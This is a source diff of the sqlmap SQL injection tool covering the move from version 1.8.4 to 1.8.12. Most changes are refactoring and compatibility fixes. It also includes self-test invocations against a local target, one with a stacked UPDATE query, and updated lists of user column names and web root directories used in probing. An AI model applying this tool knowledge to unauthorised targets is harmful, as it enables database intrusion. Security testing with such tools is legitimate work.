|
||||
key = None
|
||||
|
||||
for line in openFile(paths.COMMON_OUTPUTS, 'r'):
|
||||
if line.find('#') != -1:
|
||||
line = line[:line.find('#')]
|
||||
with openFile(paths.COMMON_OUTPUTS, 'r') as f:
|
||||
for line in f:
|
||||
if line.find('#') != -1:
|
||||
line = line[:line.find('#')]
|
||||
|
||||
line = line.strip()
|
||||
line = line.strip()
|
||||
|
||||
if len(line) > 1:
|
||||
if line.startswith('[') and line.endswith(']'):
|
||||
key = line[1:-1]
|
||||
elif key:
|
||||
if key not in kb.commonOutputs:
|
||||
kb.commonOutputs[key] = set()
|
||||
if len(line) > 1:
|
||||
if line.startswith('[') and line.endswith(']'):
|
||||
key = line[1:-1]
|
||||
elif key:
|
||||
if key not in kb.commonOutputs:
|
||||
kb.commonOutputs[key] = set()
|
||||
|
||||
if line not in kb.commonOutputs[key]:
|
||||
kb.commonOutputs[key].add(line)
|
||||
if line not in kb.commonOutputs[key]:
|
||||
kb.commonOutputs[key].add(line)
|
||||
|
||||
def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False):
|
||||
"""
|
||||
@@ -3711,10 +3716,12 @@ def joinValue(value, delimiter=','):
|
||||
'1,2'
|
||||
>>> joinValue('1')
|
||||
'1'
|
||||
>>> joinValue(['1', None])
|
||||
'1,None'
|
||||
"""
|
||||
|
||||
if isListLike(value):
|
||||
retVal = delimiter.join(value)
|
||||
retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value)
|
||||
else:
|
||||
retVal = value
|
||||
|
||||
@@ -4643,7 +4650,7 @@ def isAdminFromPrivileges(privileges):
|
||||
|
||||
return retVal
|
||||
|
||||
def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
def findPageForms(content, url, raiseException=False, addToTargets=False):
|
||||
"""
|
||||
Parses given page content for possible forms (Note: still not implemented for Python3)
|
||||
|
||||
@@ -4661,7 +4668,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not content:
|
||||
errMsg = "can't parse forms as the page content appears to be blank"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4683,7 +4690,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
forms = ParseResponse(filtered, backwards_compat=False)
|
||||
except:
|
||||
errMsg = "no success"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4710,7 +4717,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
except (ValueError, TypeError) as ex:
|
||||
errMsg = "there has been a problem while "
|
||||
errMsg += "processing page forms ('%s')" % getSafeExString(ex)
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4762,7 +4769,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not retVal and not conf.crawlDepth:
|
||||
errMsg = "there were no forms found at the given target URL"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -5271,6 +5278,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
Parses WebScarab logs (POST method not supported)
|
||||
"""
|
||||
|
||||
if WEBSCARAB_SPLITTER not in content:
|
||||
return
|
||||
|
||||
reqResList = content.split(WEBSCARAB_SPLITTER)
|
||||
|
||||
for request in reqResList:
|
||||
@@ -5354,6 +5364,8 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
if not line.strip() and index == len(lines) - 1:
|
||||
break
|
||||
|
||||
line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line)
|
||||
|
||||
newline = "\r\n" if line.endswith('\r') else '\n'
|
||||
line = line.strip('\r')
|
||||
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
|
||||
@@ -5398,9 +5410,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
|
||||
port = extractRegexResult(r":(?P<result>\d+)\Z", value)
|
||||
if port:
|
||||
value = value[:-(1 + len(port))]
|
||||
|
||||
host = value
|
||||
host = value[:-(1 + len(port))]
|
||||
else:
|
||||
host = value
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# headers and consider the following lines as
|
||||
@@ -5594,7 +5606,9 @@ def checkSums():
|
||||
expected, filename = match.groups()
|
||||
filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep)
|
||||
checkFile(filepath)
|
||||
if not hashlib.sha256(open(filepath, "rb").read()).hexdigest() == expected:
|
||||
with open(filepath, "rb") as f:
|
||||
content = f.read()
|
||||
if not hashlib.sha256(content).hexdigest() == expected:
|
||||
retVal &= False
|
||||
break
|
||||
|
||||
|
||||
@@ -435,7 +435,7 @@ def _setStdinPipeTargets():
|
||||
def next(self):
|
||||
try:
|
||||
line = next(conf.stdinPipe)
|
||||
except (IOError, OSError, TypeError):
|
||||
except (IOError, OSError, TypeError, UnicodeDecodeError):
|
||||
line = None
|
||||
|
||||
if line:
|
||||
@@ -812,6 +812,7 @@ def _setTamperingFunctions():
|
||||
raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex)))
|
||||
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
|
||||
priority = priority if priority is not None else PRIORITY.LOWEST
|
||||
|
||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||
if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
|
||||
@@ -1360,7 +1361,7 @@ def _setHTTPAuthentication():
|
||||
errMsg += "be in format 'DOMAIN\\username:password'"
|
||||
elif authType == AUTH_TYPE.PKI:
|
||||
errMsg = "HTTP PKI authentication require "
|
||||
errMsg += "usage of option `--auth-pki`"
|
||||
errMsg += "usage of option `--auth-file`"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
aCredRegExp = re.search(regExp, conf.authCred)
|
||||
@@ -2090,6 +2091,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.headersFp = {}
|
||||
kb.heuristicDbms = None
|
||||
kb.heuristicExtendedDbms = None
|
||||
kb.heuristicCode = None
|
||||
kb.heuristicMode = False
|
||||
kb.heuristicPage = False
|
||||
kb.heuristicTest = None
|
||||
|
||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
||||
import codecs
|
||||
import collections
|
||||
import inspect
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
@@ -37,9 +38,12 @@ from lib.core.data import conf
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.option import _setHTTPHandlers
|
||||
from lib.core.option import setVerbosity
|
||||
from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA
|
||||
from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.request.templates import getPageTemplate
|
||||
from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
from thirdparty.six.moves import http_client as _http_client
|
||||
|
||||
_rand = 0
|
||||
@@ -86,7 +90,7 @@ def dirtyPatches():
|
||||
if match and match.group(1).upper() != PLACE.POST:
|
||||
PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1))
|
||||
|
||||
# https://github.com/sqlmapproject/sqlmap/issues/4314
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/4314
|
||||
try:
|
||||
os.urandom(1)
|
||||
except NotImplementedError:
|
||||
@@ -95,6 +99,14 @@ def dirtyPatches():
|
||||
else:
|
||||
os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/5727
|
||||
# Reference: https://stackoverflow.com/a/14076841
|
||||
try:
|
||||
import pymysql
|
||||
pymysql.install_as_MySQLdb()
|
||||
except (ImportError, AttributeError):
|
||||
pass
|
||||
|
||||
# Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
|
||||
# Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
|
||||
if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
@@ -115,6 +127,30 @@ def dirtyPatches():

inspect.getargspec = getargspec

# Installing "reversible" unicode (decoding) error handler
def _reversible(ex):
if INVALID_UNICODE_PRIVATE_AREA:
return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
else:
return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)

codecs.register_error("reversible", _reversible)
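The block above registers a custom codecs error handler so undecodable bytes survive decoding. A self-contained sketch of the same mechanism, with a simplified handler and handler name (not sqlmap's exact constants):

    import codecs

    def _hex_escape(ex):
        # Replace each undecodable byte with a visible \xNN escape and resume
        # decoding right after the failing range.
        bad = ex.object[ex.start:ex.end]
        return u"".join(u"\\x%02x" % (b if isinstance(b, int) else ord(b)) for b in bad), ex.end

    codecs.register_error("hexescape", _hex_escape)

    print(b"foo\xffbar".decode("utf-8", errors="hexescape"))  # foo\xffbar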
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/5731
|
||||
if not hasattr(logging, "_acquireLock"):
|
||||
def _acquireLock():
|
||||
if logging._lock:
|
||||
logging._lock.acquire()
|
||||
|
||||
logging._acquireLock = _acquireLock
|
||||
|
||||
if not hasattr(logging, "_releaseLock"):
|
||||
def _releaseLock():
|
||||
if logging._lock:
|
||||
logging._lock.release()
|
||||
|
||||
logging._releaseLock = _releaseLock
|
||||
|
||||
def resolveCrossReferences():
|
||||
"""
|
||||
Place for cross-reference resolution
|
||||
|
||||
@@ -17,10 +17,9 @@ from lib.core.enums import DBMS
|
||||
from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||
from lib.core.enums import OS
|
||||
from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.8.4.0"
|
||||
VERSION = "1.8.12.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -61,6 +60,9 @@ LIVE_COOKIES_TIMEOUT = 120
|
||||
LOWER_RATIO_BOUND = 0.02
|
||||
UPPER_RATIO_BOUND = 0.98
|
||||
|
||||
# For filling in case of dumb push updates
|
||||
DUMMY_JUNK = "Gu8ohxi9"
|
||||
|
||||
# Markers for special cases when parameter values contain html encoded characters
|
||||
PARAMETER_AMP_MARKER = "__AMP__"
|
||||
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
||||
@@ -443,7 +445,7 @@ COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "
WEBSCARAB_SPLITTER = "### Conversation"

# Splitter used between requests in BURP log files
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+={10,}"
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+(={10,}|\Z)"
|
||||
|
||||
# Regex used for parsing XML Burp saved history items
|
||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.*?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||
@@ -461,7 +463,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
||||
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*\b%s\b[^\s]*)\s"
|
||||
|
||||
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
||||
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred", "sqlQuery", "requestFile")
|
||||
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred", "sqlQuery", "requestFile", "csrfToken", "csrfData", "csrfUrl", "testParameter")
|
||||
|
||||
# Maximum number of threads (avoiding connection issues and/or DoS)
|
||||
MAX_NUMBER_OF_THREADS = 10
|
||||
@@ -544,8 +546,8 @@ IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__VIEWSTATEGENERATO
|
||||
# Regular expression used for recognition of ASP.NET control parameters
|
||||
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
|
||||
|
||||
# Prefix for Google analytics cookie names
|
||||
GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
|
||||
# Regex for Google analytics cookie names
|
||||
GOOGLE_ANALYTICS_COOKIE_REGEX = r"(?i)\A(__utm|_ga|_gid|_gat|_gcl_au)"
|
||||
|
||||
# Prefix for configuration overriding environment variables
|
||||
SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
|
||||
@@ -687,7 +689,7 @@ PARAMETER_SPLITTING_REGEX = r"[,|;]"
|
||||
UNENCODED_ORIGINAL_VALUE = "original"
|
||||
|
||||
# Common column names containing usernames (used for hash cracking in some cases)
|
||||
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser")
|
||||
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "account", "account_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "customer", "cuser")
|
||||
|
||||
# Default delimiter in GET/POST values
|
||||
DEFAULT_GET_POST_DELIMITER = '&'
|
||||
@@ -795,7 +797,7 @@ BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be i
|
||||
RANDOMIZATION_TLDS = ("com", "net", "ru", "org", "de", "uk", "br", "jp", "cn", "fr", "it", "pl", "tv", "edu", "in", "ir", "es", "me", "info", "gr", "gov", "ca", "co", "se", "cz", "to", "vn", "nl", "cc", "az", "hu", "ua", "be", "no", "biz", "io", "ch", "ro", "sk", "eu", "us", "tw", "pt", "fi", "at", "lt", "kz", "cl", "hr", "pk", "lv", "la", "pe", "au")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "public_html", "wwwroot", "www", "site")
|
||||
|
||||
# Maximum length of a help part containing switch/option name(s)
|
||||
MAX_HELP_OPTION_LENGTH = 18
|
||||
@@ -804,7 +806,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
||||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException", "Arguments are of the wrong type")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException", "Arguments are of the wrong type", "Invalid conversion")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
@@ -956,12 +958,3 @@ for key, value in os.environ.items():
|
||||
globals()[_] = [__.strip() for __ in _.split(',')]
|
||||
else:
|
||||
globals()[_] = value
|
||||
|
||||
# Installing "reversible" unicode (decoding) error handler
|
||||
def _reversible(ex):
|
||||
if INVALID_UNICODE_PRIVATE_AREA:
|
||||
return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
else:
|
||||
return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
|
||||
codecs.register_error("reversible", _reversible)
|
||||
|
||||
@@ -74,7 +74,7 @@ def vulnTest():
|
||||
("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
|
||||
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
|
||||
("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")),
|
||||
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)),
|
||||
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5,foobar,nameisnull", "'987654321'",)),
|
||||
("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
|
||||
)
|
||||
|
||||
@@ -162,7 +162,9 @@ def vulnTest():
|
||||
direct = "sqlite3://%s" % database
|
||||
tmpdir = tempfile.mkdtemp()
|
||||
|
||||
content = open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))).read().replace("url =", "url = %s" % url)
|
||||
with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f:
|
||||
content = f.read().replace("url =", "url = %s" % url)
|
||||
|
||||
with open(config, "w+") as f:
|
||||
f.write(content)
|
||||
f.flush()
|
||||
@@ -214,7 +216,9 @@ def smokeTest():
|
||||
|
||||
unisonRandom()
|
||||
|
||||
content = open(paths.ERRORS_XML, "r").read()
|
||||
with open(paths.ERRORS_XML, "r") as f:
|
||||
content = f.read()
|
||||
|
||||
for regex in re.findall(r'<error regexp="(.+?)"/>', content):
|
||||
try:
|
||||
re.compile(regex)
|
||||
|
||||
@@ -68,7 +68,10 @@ def configFileParser(configFile):

try:
config = UnicodeRawConfigParser()
config.readfp(configFP)
if hasattr(config, "read_file"):
config.read_file(configFP)
else:
config.readfp(configFP)
except Exception as ex:
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
raise SqlmapSyntaxException(errMsg)
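configparser's readfp() was removed in Python 3.12, which is why the hunk above prefers read_file() when present. A minimal sketch of the fallback (sample config content is made up):

    import io
    from configparser import RawConfigParser

    def load_config(fp):
        # Prefer the modern API; fall back for very old interpreters where
        # only readfp() exists (readfp was removed in Python 3.12).
        parser = RawConfigParser()
        if hasattr(parser, "read_file"):
            parser.read_file(fp)
        else:
            parser.readfp(fp)
        return parser

    cfg = load_config(io.StringIO("[Target]\nurl = http://www.example.com/\n"))
    print(cfg.get("Target", "url"))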
|
||||
|
||||
@@ -282,15 +282,8 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
if not page or (conf.nullConnection and len(page) < 2):
|
||||
return getUnicode(page)
|
||||
|
||||
if hasattr(contentEncoding, "lower"):
|
||||
contentEncoding = contentEncoding.lower()
|
||||
else:
|
||||
contentEncoding = ""
|
||||
|
||||
if hasattr(contentType, "lower"):
|
||||
contentType = contentType.lower()
|
||||
else:
|
||||
contentType = ""
|
||||
contentEncoding = contentEncoding.lower() if hasattr(contentEncoding, "lower") else ""
|
||||
contentType = contentType.lower() if hasattr(contentType, "lower") else ""
|
||||
|
||||
if contentEncoding in ("gzip", "x-gzip", "deflate"):
|
||||
if not kb.pageCompress:
|
||||
@@ -382,7 +375,6 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
|
||||
def processResponse(page, responseHeaders, code=None, status=None):
|
||||
kb.processResponseCounter += 1
|
||||
|
||||
page = page or ""
|
||||
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)
|
||||
|
||||
@@ -297,11 +297,11 @@ class Connect(object):
finalCode = kwargs.get("finalCode", False)
chunked = kwargs.get("chunked", False) or conf.chunked

start = time.time()

if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)

start = time.time()

threadData = getCurrentThreadData()
with kb.locks.request:
kb.requestCounter += 1
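The reordering above starts the timer only after the optional --delay sleep, so the configured delay no longer inflates measured response times. A minimal sketch of the idea (names are illustrative):

    import time

    def timed_request(send, delay=0.0):
        # Sleep first, then start the timer, so a fixed inter-request delay
        # is not counted as part of the response time.
        if delay > 0:
            time.sleep(delay)
        start = time.time()
        response = send()
        return response, time.time() - start

    resp, elapsed = timed_request(lambda: "HTTP/1.1 200 OK", delay=0.1)
    print(resp, round(elapsed, 3))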
|
||||
@@ -914,12 +914,6 @@ class Connect(object):
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
|
||||
finally:
|
||||
if isinstance(page, six.binary_type):
|
||||
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
|
||||
page = six.text_type(page, errors="ignore")
|
||||
else:
|
||||
page = getUnicode(page)
|
||||
|
||||
for function in kb.postprocessFunctions:
|
||||
try:
|
||||
page, responseHeaders, code = function(page, responseHeaders, code)
|
||||
@@ -928,6 +922,12 @@ class Connect(object):
|
||||
errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex))
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if isinstance(page, six.binary_type):
|
||||
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
|
||||
page = six.text_type(page, errors="ignore")
|
||||
else:
|
||||
page = getUnicode(page)
|
||||
|
||||
for _ in (getattr(conn, "redcode", None), code):
|
||||
if _ is not None and _ in conf.abortCode:
|
||||
errMsg = "aborting due to detected HTTP code '%d'" % _
|
||||
@@ -1183,7 +1183,7 @@ class Connect(object):
|
||||
if match:
|
||||
retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString)
|
||||
else:
|
||||
match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I)
|
||||
match = re.search(r"(%s[\"']\s*:\s*[\"'])([^\"']*)" % re.escape(parameter), paramString, re.I)
|
||||
if match:
|
||||
retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
||||
|
||||
@@ -1367,18 +1367,18 @@ class Connect(object):
|
||||
|
||||
for variable in list(variables.keys()):
|
||||
if unsafeVariableNaming(variable) != variable:
|
||||
value = variables[variable]
|
||||
entry = variables[variable]
|
||||
del variables[variable]
|
||||
variables[unsafeVariableNaming(variable)] = value
|
||||
variables[unsafeVariableNaming(variable)] = entry
|
||||
|
||||
uri = variables["uri"]
|
||||
cookie = variables["cookie"]
|
||||
|
||||
for name, value in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
if isinstance(value, (int, float, six.string_types, six.binary_type)):
|
||||
for name, entry in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != entry:
|
||||
if isinstance(entry, (int, float, six.string_types, six.binary_type)):
|
||||
found = False
|
||||
value = getUnicode(value, UNICODE_ENCODING)
|
||||
entry = getUnicode(entry, UNICODE_ENCODING)
|
||||
|
||||
if kb.postHint == POST_HINT.MULTIPART:
|
||||
boundary = "--%s" % re.search(r"boundary=([^\s]+)", contentType).group(1)
|
||||
@@ -1396,7 +1396,7 @@ class Connect(object):
|
||||
found = True
|
||||
first = match.group(0)
|
||||
second = part[len(first):]
|
||||
second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(value), second)
|
||||
second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(entry), second)
|
||||
parts[i] = "%s%s" % (first, second)
|
||||
post = boundary.join(parts)
|
||||
|
||||
@@ -1404,10 +1404,10 @@ class Connect(object):
|
||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||
if re.search(r"<%s\b" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||
match = re.search(r"['\"]%s['\"]:" % re.escape(name), post)
|
||||
@@ -1417,31 +1417,31 @@ class Connect(object):
|
||||
match = re.search(r"(%s%s%s:\s*)(\d+|%s[^%s]*%s)" % (quote, re.escape(name), quote, quote, quote, quote), post)
|
||||
if match:
|
||||
found = True
|
||||
post = post.replace(match.group(0), "%s%s" % (match.group(1), value if value.isdigit() else "%s%s%s" % (match.group(0)[0], value, match.group(0)[0])))
|
||||
post = post.replace(match.group(0), "%s%s" % (match.group(1), entry if entry.isdigit() else "%s%s%s" % (match.group(0)[0], entry, match.group(0)[0])))
|
||||
post = post.replace(BOUNDARY_BACKSLASH_MARKER, "\\%s" % quote)
|
||||
|
||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(regex, r"\g<1>\g<2>%s" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||
get = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), get)
|
||||
|
||||
if re.search(regex, (query or "")):
|
||||
found = True
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), uri)
|
||||
|
||||
regex = r"((\A|%s\s*)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||
if re.search(regex, (cookie or "")):
|
||||
